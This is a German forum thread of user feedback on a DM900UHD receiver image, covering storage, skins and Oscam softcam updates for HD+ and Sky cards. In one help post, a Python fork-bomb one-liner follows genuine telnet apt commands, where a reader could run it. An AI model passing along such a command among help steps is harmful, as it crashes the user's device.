Angepinnt OE2.5: Rückmeldungen zum weekly Image für DM900UHD

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • wie mache ich eiegntlich bei der dm900 das der volle speicher bei der box benutzbar ist? bei mir steht nur 1gb frei die hat doch viel mehr :( lade ich meine picons und andere sachen herunter hab ich nur noch 500mb frei :( deswegen würde ich mich freuen wenn man denn speicher über usb oder denn vollen speicher nutzen könnte, oder hat die nur ein gb? box ist noch nicht da von mir, aber bei meinem dad wird das komischerweise so angezeigt...
      :prost: :lesen: :saufen:
    • nein joey, hätte bei meinem dad kodi installiert nur dachte ich mir mehr speicher hat ja die kiste :) deswegen wollte ich ihn erweitern bei ihm.....
      wenn man es nicht braucht dann auch gut, sorry hatte zuvor nur vu+ da wurde der speicher immer komplett angezeigt, deswegen wundere ich mich ja das die box nur 1gb angezeigt wird.....
      :prost: :lesen: :saufen:
    • liliom schrieb:

      Soeben update gemacht, HD+ und SKY ok.
      Nix für ungut Lilion, aber langsamm fühle ich mich ein bisschen auf den Arm genommen, bei dir wurde angeblich alles richtig angezeigt und hat
      auch alles nach den Update funktioniert. Sorry aber es fällt mir schwer das zu glauben.

      Ich beschäftige mich mit der Materie schon lange und deswegen bevor ich hier was schreibe habe es vorher 100 mal durchgetestet,
      noch dazu stehe ich hier nicht alleine mit dem Problem.

      Erst nach den heutigen Update und nach dem heute die Oscam auf Revision 1516 upgedatet wurde, funktioniert alles so wie es seien sollte...Anzeige etc.
    • keyfreak schrieb:

      liliom schrieb:

      Soeben update gemacht, HD+ und SKY ok.
      Nix für ungut Lilion, aber langsamm fühle ich mich ein bisschen auf den Arm genommen, bei dir wurde angeblich alles richtig angezeigt und hatauch alles nach den Update funktioniert. Sorry aber es fällt mir schwer das zu glauben.
      Nunja nur wegen deinem EGO werde ich mir keinen Bug zulegen, bei mir hats mit der 1515 auch gefunzt.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von liliom ()

    • OE2.5: Rückmeldungen zum daily Image für DM900UHD

      So, habe es ausprobiert und wieder ein Update gemacht. OSCAM Ist jetzt 1516 ... aber wieder laufen die HD+ Sender nicht, nur die SkY-Sender laufen auch nach dem Update nach wie vor problemlos.

      Auch der Status im Oscam WebIf sieht jetzt ganz anders aus ...

      Was kann ich tun?
      Ist jemand bereit mir zu helfen?

      Danke und nächtliche Grüße, Mibo
    • liliom schrieb:

      keyfreak schrieb:

      liliom schrieb:

      Soeben update gemacht, HD+ und SKY ok.
      Nix für ungut Lilion, aber langsamm fühle ich mich ein bisschen auf den Arm genommen, bei dir wurde angeblich alles richtig angezeigt und hatauch alles nach den Update funktioniert. Sorry aber es fällt mir schwer das zu glauben.
      Nunja nur wegen deinem EGO werde ich mir keinen Bug zulegen, bei mir hats mit der 1515 auch gefunzt.
      Mit EGO meist du wohl dich selber und wenn du meine Beiträge richtig lesen würdest dann würdest du auch nicht so ein schmarn hier posten.

      Natürlich hat die 1515 funktioniert, wurde aber nach wie vor als 1510 angezeigt und erst anch dem Update auf 1516 richtig.

      Aber jetzt ist es auch egal, wahrscheinlich ist deine Box von Ausserirdischen zusammengeschraubt und mit Software versorgt worden.

      Lach...
    • Mibo schrieb:

      So, habe es ausprobiert und wieder ein Update gemacht. OSCAM Ist jetzt 1516 ... aber wieder laufen die HD+ Sender nicht, nur die SkY-Sender laufen auch nach dem Update nach wie vor problemlos.

      Auch der Status im Oscam WebIf sieht jetzt ganz anders aus ...

      Was kann ich tun?
      Ist jemand bereit mir zu helfen?

      Danke und nächtliche Grüße, Mibo
      Hallo,

      zieh mal die HD+ Karte ein mal raus und dann wieder rein, bei mir ging die ORF ICE Karte nach den Update auf Anhieb...erst nach dem ich die raus und wieder reingesteckt habe.

      Das Webif sieht anders aus da nach den Update das Modern Webif angezeigt wird, du musst diene bzw. eine andre beliebige Oscam BIN-Datei mit den Modern ersetzen...danach die Cam ein mal neustarten.

      Ansonsten kannst du die hier nehmen, wenn natürlich das Hochladen erlaubt ist.

      Viel erfolg und Gruß
      keyfreak
      Dateien
      • Test.zip

        (711,77 kB, 143 mal heruntergeladen, zuletzt: )
    • gestern nochmal ein update gemacht. hab nach wie vor das problem, dass es beim skin "dmconcinnity hd" teilweise verschiebungen gibt in verschiedenen screens. nicht sooo tragisch, aber unschön. bin dennoch auf backup vom 4.4. zurück. dort noch alles io.
      ********************************
      the gOOd old times will never come back
      DM900UHD - nn2 OE2.5 (2022)
    • Gib mal per telnet auf der Box ein:

      Quellcode

      1. apt-get update
      2. apt-cache search camd
      Dann siehste alle configs die für oscam in frage kommen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Danke kati910,

      das wolte ich aber nicht wissen, sondern ob bestimmte Configs in der Oscam von heute indegriert wurden
      da die von der Größe her doppelt so groß ist und noch dazu schrieben manchen User dass die Karten mit der
      sogar ohne Configs, Boxkeys etc. llaufen.